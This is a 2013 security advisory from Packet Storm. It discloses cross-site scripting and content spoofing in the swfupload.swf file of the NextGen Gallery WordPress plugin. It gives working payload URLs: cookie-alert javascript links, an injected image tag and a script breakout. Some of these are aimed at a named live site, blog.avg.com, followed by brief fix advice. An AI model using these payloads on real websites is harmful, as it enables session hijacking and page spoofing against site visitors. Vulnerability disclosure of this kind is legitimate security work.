AVG Official Blog Cross Site Scripting

2013-06-07T00:00:00
ID PACKETSTORM:121929
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2013-06-07T00:00:00

Description

                                        
                                            `#########################################################  
# Title : Cross Site Scripting in AVG Official Blog  
# Author : Ryuzaki Lawlet  
# Blog : justryuz.blogspot.com / www.justryuz.com  
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org  
# Date: 6/5/2013 (4.44 pm)  
# Vendor: http://wordpress.org/plugins/nextgen-gallery/  
# Type : Web Apps  
# Vector of operation: Remote  
# Impact: Cross Site Scripting & Content Spoofing  
# Tested on : Ubuntu / Window XP  
##########################################################  
  
*Description:  
  
The vulnerability is caused due to insufficient input validation in the parameter  
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be  
exploited to execute arbitrary HTML and script code in a user’s browser session in  
context of an affected site.  
  
There are two vulnerabilities in AVG Official Blog.  
------->  
Exploit  
  
*Content Spoofing  
  
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>  
  
It's possible to inject text, images and html (e.g. for link injection).  
  
*Cross-Site Scripting  
  
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>  
  
Code will execute after click. It's strictly social XSS.  
  
*Proof of Concept Code  
  
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]  
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swfbuttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>  
  
*Live Preview  
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//  
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>  
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>  
  
  
<------  
  
Screenshot:  
http://i.imgur.com/A4rKq0Q.jpg  
  
*Solution:  
On the server side, you can upgrade to a non-vulnerable version. On the client  
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.  
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.   
  
Reff: http://justryuz.blogspot.com/2013/05/cross-site-scripting-in-avg-official.html  
`